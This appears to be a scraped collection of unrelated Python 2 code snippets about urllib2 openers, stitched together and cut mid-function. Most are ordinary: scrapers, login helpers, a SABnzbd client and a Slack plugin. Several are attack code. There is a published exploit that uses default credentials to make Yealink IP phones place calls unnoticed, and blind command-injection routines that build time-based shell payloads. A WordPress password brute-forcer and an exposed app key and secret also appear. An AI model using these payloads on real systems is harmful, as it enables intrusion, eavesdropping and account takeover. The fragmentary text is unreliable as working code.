                        exit("[!] invalid configuration (line: '%s')" % line)
                array = line.upper()
                config[array] = []
                continue

            if array and line.startswith(' '):
                config[array].append(line.strip())
                continue
            else:
                array = None
                try:
                    name, value = line.strip().split(' ', 1)
                except ValueError:
                    name = line
                    value = ""
                finally:
                    name = name.strip().upper()
                    value = value.strip("'\"").strip()

            _ = os.environ.get("%s_%s" % (NAME.upper(), name))
            if _:
                value = _

            if any(
                    name.startswith(_)
                    for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_",
                              "DISABLE_")):
                value = value.lower() in ("1", "true")
            elif value.isdigit():
                value = int(value)
            else:
                for match in re.finditer(r"\$([A-Z0-9_]+)", value):
                    if match.group(1) in globals():
                        value = value.replace(match.group(0),
                                              str(globals()[match.group(1)]))
                    else:
                        value = value.replace(
                            match.group(0),
                            os.environ.get(match.group(1), match.group(0)))
                if name.endswith("_DIR"):
                    value = os.path.realpath(
                        os.path.join(ROOT_DIR, os.path.expanduser(value)))

            config[name] = value

    except (IOError, OSError):
        pass

    for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"):
        if not option in config:
            exit("[!] missing mandatory option '%s' in configuration file '%s'"
                 % (option, config_file))

    for entry in (config.USERS or []):
        if len(entry.split(':')) != 4:
            exit("[!] invalid USERS entry '%s'" % entry)
        if re.search(r"\$\d+\$", entry):
            exit(
                "[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)"
                % entry)

    if config.SSL_PEM:
        config.SSL_PEM = config.SSL_PEM.replace('/', os.sep)

    if config.USER_WHITELIST:
        if ',' in config.USER_WHITELIST:
            print(
                "[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file"
            )
        elif not os.path.isfile(config.USER_WHITELIST):
            exit("[!] missing 'USER_WHITELIST' file '%s'" %
                 config.USER_WHITELIST)
        else:
            read_whitelist()

    if config.USER_IGNORELIST:
        if not os.path.isfile(config.USER_IGNORELIST):
            exit("[!] missing 'USER_IGNORELIST' file '%s'" %
                 config.USER_IGNORELIST)
        else:
            read_ignorelist()

    config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES)

    if config.USE_MULTIPROCESSING:
        print(
            "[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead"
        )

    if config.DISABLE_LOCAL_LOG_STORAGE and not any(
        (config.LOG_SERVER, config.SYSLOG_SERVER)):
        print(
            "[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data"
        )

    if config.UDP_ADDRESS is not None and config.UDP_PORT is None:
        exit(
            "[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'"
        )

    if config.UDP_ADDRESS is None and config.UDP_PORT is not None:
        exit(
            "[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'"
        )

    if not str(config.HTTP_PORT or "").isdigit():
        exit("[!] invalid configuration value for 'HTTP_PORT' ('%s')" %
             config.HTTP_PORT)

    if config.PROCESS_COUNT and subprocess.mswindows:
        print "[x] multiprocessing is currently not supported on Windows OS"
        config.PROCESS_COUNT = 1

    if config.CAPTURE_BUFFER:
        if str(config.CAPTURE_BUFFER or "").isdigit():
            config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER)
        elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER):
            match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER)
            config.CAPTURE_BUFFER = int(match.group(1)) * {
                "K": 1024,
                "M": 1024**2,
                "G": 1024**3
            }[match.group(2).upper()]
        elif re.search(r"\d+%", config.CAPTURE_BUFFER):
            physmem = _get_total_physmem()

            if physmem:
                config.CAPTURE_BUFFER = physmem * int(
                    re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100
            else:
                exit(
                    "[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'"
                )
        else:
            exit(
                "[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" %
                config.CAPTURE_BUFFER)

        config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH

    if config.PROXY_ADDRESS:
        PROXIES.update({
            "http": config.PROXY_ADDRESS,
            "https": config.PROXY_ADDRESS
        })
        opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES))
        urllib2.install_opener(opener)
Example #33
0
    def _cached_http_get(self,
                         url,
                         base_url,
                         timeout,
                         cookies=None,
                         data=None,
                         multipart_data=None,
                         headers=None,
                         allow_redirect=True,
                         cache_limit=8):
        if cookies is None: cookies = {}
        if timeout == 0: timeout = None
        if headers is None: headers = {}
        referer = headers['Referer'] if 'Referer' in headers else url
        log_utils.log(
            'Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' %
            (url, cookies, data, headers))
        self.create_db_connection()
        _, html = self.db_connection.get_cached_url(url, cache_limit)
        if html:
            log_utils.log('Returning cached result for: %s' % (url),
                          xbmc.LOGDEBUG)
            return html

        try:
            self.cj = self._set_cookies(base_url, cookies)
            if data is not None: data = urllib.urlencode(data, True)
            if multipart_data is not None:
                headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X'
                data = multipart_data

            request = urllib2.Request(url, data=data)
            request.add_header('User-Agent', USER_AGENT)
            request.add_unredirected_header('Host', request.get_host())
            request.add_unredirected_header('Referer', referer)
            for key in headers:
                request.add_header(key, headers[key])
            self.cj.add_cookie_header(request)
            if not allow_redirect:
                opener = urllib2.build_opener(NoRedirection)
                urllib2.install_opener(opener)
            else:
                opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
                urllib2.install_opener(opener)

            response = urllib2.urlopen(request, timeout=timeout)
            self.cj.extract_cookies(response, request)
            if xbmcaddon.Addon().getSetting('cookie_debug') == 'true':
                log_utils.log(
                    'Response Cookies: %s - %s' %
                    (url, self.cookies_as_str(self.cj)), xbmc.LOGDEBUG)
            self.__fix_bad_cookies()
            self.cj.save(ignore_discard=True)
            if not allow_redirect and response.getcode() in [
                    301, 302, 303, 307
            ]:
                return response.info().getheader('Location')

            if response.info().get('Content-Encoding') == 'gzip':
                buf = StringIO(response.read())
                f = gzip.GzipFile(fileobj=buf)
                html = f.read()
            else:
                html = response.read()
        except urllib2.HTTPError as e:
            if e.code == 503 and 'cf-browser-verification' in e.read():
                html = cloudflare.solve(url, self.cj)
                if not html:
                    return ''
            else:
                log_utils.log(
                    'Error (%s) during scraper http get: %s' % (str(e), url),
                    xbmc.LOGWARNING)
                return ''
        except Exception as e:
            log_utils.log(
                'Error (%s) during scraper http get: %s' % (str(e), url),
                xbmc.LOGWARNING)
            return ''

        self.db_connection.cache_url(url, html)
        return html
def _setup_http_client(proxy):
    """Configure proxy server and install HTTP opener"""
    proxy_config = {'http': proxy} if proxy else {}
    proxy_handler = urllib2.ProxyHandler(proxy_config)
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
Example #35
0
def do_login(username, pwd, cookie_file):
    """"
    Perform login action with use name, password and saving cookies.
    @param username: login user name
    @param pwd: login password
    @param cookie_file: file name where to save cookies when login succeeded 
    """
    # POST data per LOGIN WEIBO, these fields can be captured using httpfox extension in FIrefox
    login_data = {
        'entry': 'weibo',
        'gateway': '1',
        'from': '',
        'savestate': '7',
        'userticket': '1',
        'pagerefer': '',
        'vsnf': '1',
        'su': '',
        'service': 'miniblog',
        'servertime': '',
        'nonce': '',
        'pwencode': 'rsa2',
        'rsakv': '',
        'sp': '',
        'encoding': 'UTF-8',
        'prelt': '45',
        'url':
        'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack',
        'returntype': 'META'
    }

    cookie_jar2 = cookielib.LWPCookieJar()
    cookie_support2 = urllib2.HTTPCookieProcessor(cookie_jar2)
    opener2 = urllib2.build_opener(cookie_support2, urllib2.HTTPHandler)
    urllib2.install_opener(opener2)
    login_url = 'http://login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.11)'
    try:
        servertime, nonce, rsakv = get_prelogin_status(username)
    except:
        return

    # Fill POST data
    print 'starting to set login_data'
    login_data['servertime'] = servertime
    login_data['nonce'] = nonce
    login_data['su'] = get_user(username)
    login_data['sp'] = get_pwd_rsa(pwd, servertime, nonce)
    login_data['rsakv'] = rsakv
    login_data = urllib.urlencode(login_data)
    http_headers = {
        'User-Agent':
        'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0'
    }
    req_login = urllib2.Request(url=login_url,
                                data=login_data,
                                headers=http_headers)
    result = urllib2.urlopen(req_login)
    text = result.read()
    p = re.compile('location\.replace\(\'(.*?)\'\)')
    # 在使用httpfox登录调试时,我获取的返回参数  location.replace('http://weibo.com 这里使用的是单引号 原来的正则中匹配的是双引号# 导致没有login_url得到 单引号本身在re中无需转义
    # p = re.compile('location\.replace\(\B'(.*?)'\B\)') 经调试 这样子是错误的 re中非的使用\'才能表达单引号
    try:
        # Search login redirection URL
        login_url = p.search(text).group(1)
        data = urllib2.urlopen(login_url).read()
        # Verify login feedback, check whether result is TRUE
        patt_feedback = 'feedBackUrlCallBack\((.*)\)'
        p = re.compile(patt_feedback, re.MULTILINE)

        feedback = p.search(data).group(1)
        feedback_json = json.loads(feedback)
        if feedback_json['result']:
            cookie_jar2.save(cookie_file,
                             ignore_discard=True,
                             ignore_expires=True)
            return 1
        else:
            return 0
    except:
        return 0
Example #36
0
available sip account, without supervision or confirmation of the user,
also the call receiver can listen through the phone mic .]

#!/usr/bin/python

import urllib2, sys

print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"

if (len(sys.argv) != 3):
    print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
    print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
    exit(0)

IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
webU = 'user'
webP = 'user'

query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)


urllib2.install_opener(log)

queryPag = urllib2.urlopen(UrlGet_params)

print "\n Call to %s form IP phone %s\n" %(num,IP)
print 'CHECK: ' + CHECK
print 'ALLKMEANS: ' + ALLKMEANS
print 'ALLMATMUL: ' + ALLMATMUL

POSTDATA = urllib.urlencode({
    'j_username': '******',
    'j_password': '******',
    'from': '/',
    'json':
    '{"j_username": "******", "j_password": "******", "remember_me": false, "from": "/"}',
    'Submit': 'log in'
})
print 'POSTDATA OK'

cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
print 'Cookie Support OK'

if os.path.exists(DATADIR):
    print 'Data Folder Exists'
    OFFLINE = 1
else:
    print 'Create Data Folder'
    os.mkdir(DATADIR)
    OFFLINE = 0
    print 'OK'

print _GAP
print '# Get Cookie to Log in'
print _GAP
Example #38
0
def exploitation(url, delay, filename):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    injection_type = "Blind-based Command Injection"
    technique = "time-based injection technique"

    # Print the findings to log file.
    output_file = open(filename + ".txt", "a")
    output_file.write("\n---")
    output_file.write("\n(+) Type : " + injection_type)
    output_file.write("\n(+) Technique : " + technique.title())
    output_file.close()

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = menu.options.maxlen

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print colors.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + colors.RESET

    sys.stdout.write("(*) Testing the " + technique + "... ")
    sys.stdout.flush()

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for seperator in settings.SEPERATORS:

                # Encode (urlencode) prefixes and suffixes
                encoded_prefix = urllib.quote_plus(prefix)
                encoded_suffix = urllib.quote_plus(suffix)

                # Change TAG on every request to prevent false-positive resutls.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase) for i in range(6))
                tag_length = len(TAG) + 4
                for j in range(1, int(tag_length)):
                    try:
                        if seperator == ";":
                            payload = (
                                seperator + " "
                                "str=$(echo " + TAG + ")" + seperator + " "
                                # Find the length of the output.
                                "str1=${#str}" + seperator + " "
                                "if [ \"" + str(j) + "\" -ne ${str1} ]" +
                                seperator + " "
                                "then sleep 0" + seperator + " "
                                "else sleep " + str(delay) + seperator + " "
                                "fi ")

                        elif seperator == "&&":
                            payload = (
                                urllib.quote('&') + " " + "sleep 0 " +
                                urllib.quote(seperator) + " "
                                "str=$(echo " + TAG + ")" +
                                urllib.quote(seperator) + " "
                                # Find the length of the output.
                                "str1=${#str}" + urllib.quote(seperator) + " "
                                "[ " + str(j) + " -eq ${str1} ]" +
                                urllib.quote(seperator) + " "
                                "sleep 1 ")

                        elif seperator == "||":
                            payload = (seperator + " "
                                       "echo '" + TAG + "' | " + "[ " +
                                       str(j) + " -ne $(echo \"" + TAG +
                                       "\" | wc -c) ] " + seperator + " "
                                       "sleep " + str(delay))
                        else:
                            pass

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload

                        else:
                            encoded_payload = encoded_prefix + payload
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix

                        else:
                            encoded_payload = encoded_payload + encoded_suffix
                            payload = payload + suffix

                        payload_list = []
                        if payload != encoded_payload:
                            payload_list.append(payload)
                            payload_list.append(encoded_payload)
                        else:
                            payload_list.append(payload)

                        for payload in payload_list:
                            if urllib.unquote(payload) == payload:
                                is_encoded = True

                            #payload = re.sub(" ", "%20", payload)
                            # Check if defined "--verbose" option.
                            if menu.options.verbose:
                                if seperator == ";" or seperator == "&&" or seperator == "||":
                                    sys.stdout.write("\n" + colors.GREY +
                                                     payload + colors.RESET)

                            start = 0
                            end = 0
                            start = time.time()

                            # Check if defined method is GET (Default).
                            if menu.options.method == "GET":
                                payload = urllib.quote(payload)

                                # Define the vulnerable parameter
                                if re.findall(
                                        r"&(.*)=" + settings.INJECT_TAG + "",
                                        url):
                                    vuln_parameter = re.findall(
                                        r"&(.*)=" + settings.INJECT_TAG + "",
                                        url)
                                    vuln_parameter = ''.join(vuln_parameter)

                                elif re.findall(
                                        r"\?(.*)=" + settings.INJECT_TAG + "",
                                        url):
                                    vuln_parameter = re.findall(
                                        r"\?(.*)=" + settings.INJECT_TAG + "",
                                        url)
                                    vuln_parameter = ''.join(vuln_parameter)

                                else:
                                    vuln_parameter = url

                                target = re.sub(settings.INJECT_TAG, payload,
                                                url)
                                request = urllib2.Request(target)

                                # Check if defined extra headers.
                                headers.do_check(request)

                                # Check if defined any HTTP Proxy.
                                if menu.options.proxy:
                                    try:
                                        proxy = urllib2.ProxyHandler(
                                            {'http': menu.options.proxy})
                                        opener = urllib2.build_opener(proxy)
                                        urllib2.install_opener(opener)
                                        response = urllib2.urlopen(request)
                                        response.read()

                                    except urllib2.HTTPError, err:
                                        print "\n(x) Error : " + str(err)
                                        sys.exit(1)

                                else:
                                    response = urllib2.urlopen(request)
                                    response.read()

                            # Check if defined method is POST.
                            else:
                                # Check if defined the testable parameters.
                                if not menu.options.parameter:
                                    print colors.RED + "(x) Error: You must specify the testable parameter.\n" + colors.RESET
                                    break

                                else:
                                    parameter = menu.options.parameter
                                    parameter = urllib2.unquote(parameter)
                                    data = re.sub(settings.INJECT_TAG, payload,
                                                  parameter)

                                    # Define the vulnerable parameter
                                    if re.findall(
                                            r"&(.*)=" + settings.INJECT_TAG +
                                            "", url):
                                        vuln_parameter = re.findall(
                                            r"&(.*)=" + settings.INJECT_TAG +
                                            "", url)
                                        vuln_parameter = ''.join(
                                            vuln_parameter)

                                    elif re.findall(
                                            r"\?(.*)=" + settings.INJECT_TAG +
                                            "", url):
                                        vuln_parameter = re.findall(
                                            r"\?(.*)=" + settings.INJECT_TAG +
                                            "", url)
                                        vuln_parameter = ''.join(
                                            vuln_parameter)

                                    else:
                                        vuln_parameter = parameter

                                    request = urllib2.Request(url, data)

                                    # Check if defined extra headers.
                                    headers.do_check(request)

                                    # Check if defined any HTTP Proxy.
                                    if menu.options.proxy:
                                        try:
                                            proxy = urllib2.ProxyHandler(
                                                {'http': menu.options.proxy})
                                            opener = urllib2.build_opener(
                                                proxy)
                                            urllib2.install_opener(opener)
                                            response = urllib2.urlopen(request)
                                            response.read()

                                        except urllib2.HTTPError, err:
                                            print "\n(x) Error : " + str(err)
                                            sys.exit(1)

                                    else:
                                        response = urllib2.urlopen(request)
                                        response.read()

                            end = time.time()
                            how_long = int(end - start)
Example #39
0
            gravatar_url = "http://www.gravatar.com/avatar/" + hashlib.md5(
                email.lower()).hexdigest() + "?"
            gravatar_url += urllib.urlencode({'d': default, 's': str(size)})
            userIconURL = gravatar_url
            self.debugLog(u"User icon set to gravatar: %s" % userIconURL)
        else:
            self.debugLog(u"User icon url set to: %s" % userIconURL)
        ##############################################################################################

        # construct the file upload ##################################################################
        if theFilePath is None or theFilePath == "":
            self.debugLog(u"No file path was entered")
        else:
            theFilePath = theFilePath.strip()
            if os.path.isfile(theFilePath):
                opener = urllib2.build_opener(
                    MultipartPostHandler.MultipartPostHandler)
                params = {"token": slackToken, "file": open(theFilePath, "rb")}
                fileUploadURL = 'https://slack.com/api/files.upload?'
            else:
                indigo.server.log(u"Invalid path to the file.")
        ##############################################################################################

        # construct and attempt to send payload to Slack #############################################
        if theUsername is None or theUsername == "":
            theUsername = userName
            self.debugLog(u"Username set to %s (bot)" % userName)
        surl = 'https://hooks.slack.com/services/%s' % URLtoken
        self.debugLog(u"Slack payload url: %s" % surl)
        if pluginAction.props['imageurl'] is None or pluginAction.props[
                'imageurl'] == "":
            if theChannel and theUsername and theText != "":
Example #40
0
def post(url, data):
    req = urllib2.Request(url)
    data = urllib.urlencode(data)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    response = opener.open(req, data)
    return response.read()
Example #41
0
start_end_times = [[query_day + " 00:00:00", query_day + " 18:59:59"],
                   [query_day + " 19:00:00", query_day + " 23:59:59"]]
# query_set = [
#     u'所有操作慢',
#     u'浏览网页慢',
#     u'他网视频慢',
#     u'下载慢',
#     u'游戏慢',
#     u'游戏问题'
# ]
query_codes = ['3222', '3223', '3224', '3225', '3226', '3229']
# firedebug得出相应查询码
postUrl = 'http://218.108.129.189:19090/ccps/login.action'
cookie = cookielib.CookieJar()
handler = urllib2.HTTPCookieProcessor(cookie)
post_opener = urllib2.build_opener(handler)
# 将cookies绑定到一个opener    cookie由cookielib自动管理
username = '******'
password = '******'
postData = {
    'staff.password': password,
    'staff.wcode': username,
}
headers = {
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding':
    'gzip, deflate',
    'Accept-Language':
    'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Host':
Example #42
0
                                                request = urllib2.Request(
                                                    target)

                                                # Check if defined extra headers.
                                                headers.do_check(request)

                                                # Check if defined any HTTP Proxy.
                                                if menu.options.proxy:
                                                    try:
                                                        proxy = urllib2.ProxyHandler(
                                                            {
                                                                'http':
                                                                menu.options.
                                                                proxy
                                                            })
                                                        opener = urllib2.build_opener(
                                                            proxy)
                                                        urllib2.install_opener(
                                                            opener)
                                                        response = urllib2.urlopen(
                                                            request)
                                                        response.read()

                                                    except urllib2.HTTPError, err:
                                                        print "\n(x) Error : " + str(
                                                            err)
                                                        sys.exit(1)

                                                else:
                                                    response = urllib2.urlopen(
                                                        request)
                                                    response.read()
Example #43
0
        rec = {'tc' : 'T', 'keyw' : [], 'jnl' : 'BOOK'}
        for a in div.find_all('a'):
            rec['artlink'] = 'https://dspace.cuni.cz' + a['href'] #+ '?show=full'
            rec['hdl'] = re.sub('.*handle\/', '', a['href'])
            for h5 in div.find_all('h5', attrs = {'class' : 'work-type'}):
                if re.search('dissertation thesis', h5.text):
                    recs.append(rec)
                else:
                    print '[%i] skip %s' % (i, h5.text.strip())

    i = 0
    for rec in recs:
        i += 1
        print '---{ %s }---{ %i/%i}---{ %s }------' % (year, i, len(recs), rec['artlink'])
        try:
            artpage = BeautifulSoup(urllib2.build_opener(urllib2.HTTPCookieProcessor).open(rec['artlink']))
            time.sleep(3)
        except:
            try:
                print "retry %s in 180 seconds" % (rec['artlink'])
                time.sleep(180)
                artpage = BeautifulSoup(urllib2.build_opener(urllib2.HTTPCookieProcessor).open(rec['artlink']))
            except:
                print "no access to %s" % (rec['artlink'])
                continue    
        for meta in artpage.head.find_all('meta'):
            if meta.has_attr('name'):
                #author
                if meta['name'] == 'DC.creator':
                    author = re.sub(' *\[.*', '', meta['content'])
                    rec['autaff'] = [[ author ]]
Example #44
0
def sendNZB(nzb):
    """
    Sends an NZB to SABnzbd via the API.

    :param nzb: The NZBSearchResult object to send to SAB
    """

    # set up a dict with the URL params in it
    params = {}
    if sickbeard.SAB_USERNAME != None:
        params[b'ma_username'] = sickbeard.SAB_USERNAME
    if sickbeard.SAB_PASSWORD != None:
        params[b'ma_password'] = sickbeard.SAB_PASSWORD
    if sickbeard.SAB_APIKEY != None:
        params[b'apikey'] = sickbeard.SAB_APIKEY
    category = sickbeard.SAB_CATEGORY
    if nzb.show.is_anime:
        category = sickbeard.SAB_CATEGORY_ANIME

    # if it aired more than 7 days ago, override with the backlog category IDs
    for curEp in nzb.episodes:
        if datetime.date.today() - curEp.airdate > datetime.timedelta(days=7):
            category = sickbeard.SAB_CATEGORY_BACKLOG
            if nzb.show.is_anime:
                category = sickbeard.SAB_CATEGORY_ANIME_BACKLOG

    if category != None:
        params[b'cat'] = category

    # use high priority if specified (recently aired episode)
    if nzb.priority == 1:
        if sickbeard.SAB_FORCED == 1:
            params[b'priority'] = 2
        else:
            params[b'priority'] = 1

    # if it's a normal result we just pass SAB the URL
    if nzb.resultType == "nzb":
        # for newzbin results send the ID to sab specifically
        if nzb.provider.getID() == 'newzbin':
            id = nzb.provider.getIDFromURL(nzb.url)
            if not id:
                logging.error("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url))
                return False
            params[b'mode'] = 'addid'
            params[b'name'] = id
        else:
            params[b'mode'] = 'addurl'
            params[b'name'] = nzb.url

    # if we get a raw data result we want to upload it to SAB
    elif nzb.resultType == "nzbdata":
        params[b'mode'] = 'addfile'
        multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

    url = sickbeard.SAB_HOST + "api?" + urllib.urlencode(params)

    logging.info("Sending NZB to SABnzbd")
    logging.debug("URL: " + url)

    try:
        # if we have the URL to an NZB then we've built up the SAB API URL already so just call it
        if nzb.resultType == "nzb":
            f = urllib.urlopen(url)

        # if we are uploading the NZB data to SAB then we need to build a little POST form and send it
        elif nzb.resultType == "nzbdata":
            cookies = cookielib.CookieJar()
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                          MultipartPostHandler.MultipartPostHandler)
            req = urllib2.Request(url,
                                  multiPartParams,
                                  headers={'User-Agent': USER_AGENT})

            f = opener.open(req)

    except (EOFError, IOError) as e:
        logging.error("Unable to connect to SAB: {}".format(ex(e)))
        return False

    except httplib.InvalidURL as e:
        logging.error("Invalid SAB host, check your config: {}".format(ex(e)))
        return False

    # this means we couldn't open the connection or something just as bad
    if f == None:
        logging.error("No data returned from SABnzbd, NZB not sent")
        return False

    # if we opened the URL connection then read the result from SAB
    try:
        result = f.readlines()
    except Exception as e:
        logging.error("Error trying to get result from SAB, NZB not sent: {}".format(ex(e)))
        return False

    # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't recieve the NZB
    if len(result) == 0:
        logging.error("No data returned from SABnzbd, NZB not sent")
        return False

    # massage the result a little bit
    sabText = result[0].strip()

    logging.debug("Result text from SAB: " + sabText)

    # do some crude parsing of the result text to determine what SAB said
    if sabText == "ok":
        logging.debug("NZB sent to SAB successfully")
        return True
    elif sabText == "Missing authentication":
        logging.error("Incorrect username/password sent to SAB, NZB not sent")
        return False
    else:
        logging.error("Unknown failure sending NZB to sab. Return text is: " + sabText)
        return False
Example #45
0
import sys
import urllib2

#sina
APP_KEY = '377217891'  #youre app key
APP_SECRET = '723905a68a35ca6e2f30016230337e8f'  #youre app secret
CALLBACK_URL = 'http://6.helloelmer.sinaapp.com/callback'
ACCOUNT = '*****@*****.**'  #your email address
PASSWORD = sys.argv[1]  #'******'     #your pw

#gplus
GPLUS_ENABLE = True

GPLUS_URLS = ("https://plus.google.com/communities/112204979951069292983", )

#proxy
PROXY = None  #"http://127.0.0.1"
if PROXY:
    proxy_support = urllib2.ProxyHandler({'http': PROXY})
    opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
    urllib2.install_opener(opener)
Example #46
0
pages = int(raw_input("enter number of pages to scrap:"))

url = 'https://www.reddit.com/'

i = 1

while pages > 0:

    request = urllib2.Request(url)

    request.add_header(
        'User-Agent',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
    )

    myurlopener = urllib2.build_opener()

    myurl = myurlopener.open(request)

    spinner = Halo(text="Processing Page", spinner="dots")

    spinner.start()

    myurldata = myurl.read()

    soup = BeautifulSoup(myurldata, 'lxml')

    # find the div containing data and iterate over it
    for choice in soup.find_all('div', class_='thing'):

        topicName = choice.find('p', class_='title').a.text.encode(
Example #47
0
def build_opener(*args, **kwargs):
    if PYTHON_3: return urllib.request.build_opener(*args, **kwargs)
    else: return urllib2.build_opener(*args, **kwargs)  #@UndefinedVariable
Example #48
0
    def dataGenerator(self, allFileIndices, queries, currentPath):
        final_directory = os.path.join(currentPath, r'theData')
        if not os.path.exists(final_directory):
            os.makedirs(final_directory)

        allSubDirectories = []
        for query in queries:
            subDirectory = os.path.join(final_directory, query)
            if not os.path.exists(subDirectory):
                os.makedirs(subDirectory)
            allSubDirectories.append(subDirectory)

        allDocWordCount = []

        for i in range(0, len(queries)):
            cnt = 0
            docWordCount = []
            for theUrl in allFileIndices[i]:
                if cnt < 60:
                    try:
                        ctx = ssl.create_default_context()
                        ctx.check_hostname = False
                        ctx.verify_mode = ssl.CERT_NONE
                        opener = urllib2.build_opener(
                            urllib2.HTTPSHandler(context=ctx))
                        opener.addheaders = [('Referer', theUrl)]
                        html = opener.open(theUrl, timeout=10).read()
                        soup = BeautifulSoup(html, "lxml")

                        textTemp = list()
                        try:
                            textTemp.append(soup.find('title').text)
                            textTemp.append('\n')
                            for theText in soup.find_all(
                                ['p'], text=True
                            ):  #,'li']):#,'li']):#,'ul']):#,'span']):#,'li']):
                                textTemp.append(theText.text)
                        except:
                            print theUrl
                            pass

                        text = " ".join(textTemp)
                        lines = (line.strip() for line in text.splitlines())
                        chunks = (phrase.strip() for line in lines
                                  for phrase in line.split("  "))
                        text = '\n'.join(chunk for chunk in chunks if chunk)
                        text = text.encode('utf8')
                        if len(text.split(' ')) >= 50:
                            docWordCount.append(len(text.split(' ')))
                            tmpFile = str(cnt) + ".txt"
                            indexFile = open(
                                allSubDirectories[i] + "/" + tmpFile, "w")
                            indexFile.write(text)
                            indexFile.close()
                            cnt = cnt + 1
                    except:
                        pass
            allDocWordCount.append(docWordCount)

        with open(currentPath + '/' + 'allDocWordCount.pkl', 'wb') as f2:
            pickle.dump(allDocWordCount, f2)
        return allDocWordCount
Example #49
0
if (len(username)>0 and len(password)>0):
    mode = 1 #single
elif (len(username)>0 and len(passFile)>0):
    mode = 2 #
elif (len(userFile)>0 and len(password)>0):
    mode = 3
elif (len(userFile)>0 and len(passFile)>0):
    mode = 4 

#
#init opener
#
cookieJar = cookielib.CookieJar()
cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
if useProxy == 0:
    opener = urllib2.build_opener(cookieHandler)
else:
    opener = urllib2.build_opener(proxyHandler,cookieHandler)
opener.addheaders = [('User-agent', agent)]
cookieJar.clear()
cookieJar.clear_session_cookies()

#
#main
#
try:
    response = opener.open(url)
    content = response.read()
    if mode == 1:
        values = {'log' : username,
                      'pwd' : password,
Example #50
0
 def login(self, openurl):
     cj = cookielib.CookieJar()
     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
     opener.open(__scraper__.loginurl, self.loginData)
     link = opener.open(openurl).read()
     return link
Example #51
0
# -*- coding: utf-8 -*-

import urllib2

# 构建一个 HTTPHandler 构建起对象,支持处理HTTP的请求
# debuglevel=1 自动打开debug log 模式
http_handler = urllib2.HTTPHandler(debuglevel=1)

# 使用build_opener() 方法构建一个自定义的opener
opener = urllib2.build_opener(http_handler)

url = 'http://www.baidu.com'
req = urllib2.Request(url)
res = opener.open(req)
content = res.read()
#print(content)
Example #52
0
 def __init__(self,
              api_path,
              username="",
              password="",
              use_auth=True,
              auth_type="basic",
              consumer_key=None,
              consumer_secret=None,
              oauth_token=None,
              oauth_token_secret=None,
              validate_ssl=True,
              save_oauth_credentials=None):
     import base64
     self.api_path = api_path
     if self.api_path[
             -1] == "/":  # We don't want a surplus / when creating request URLs. Sure, most servers will handle it well, but why take the chance?
         self.api_path == self.api_path[:-1]
     if domain_regex.findall(self.api_path)[0][2] == "api.twitter.com":
         self.is_twitter = True
     else:
         self.is_twitter = False
     if validate_ssl:
         #TODO: Implement SSL-validating handler and add it to opener here
         self.opener = urllib2.build_opener()
     else:
         self.opener = urllib2.build_opener()
     self.use_auth = use_auth
     self.auth_type = auth_type
     self.oauth_token = oauth_token
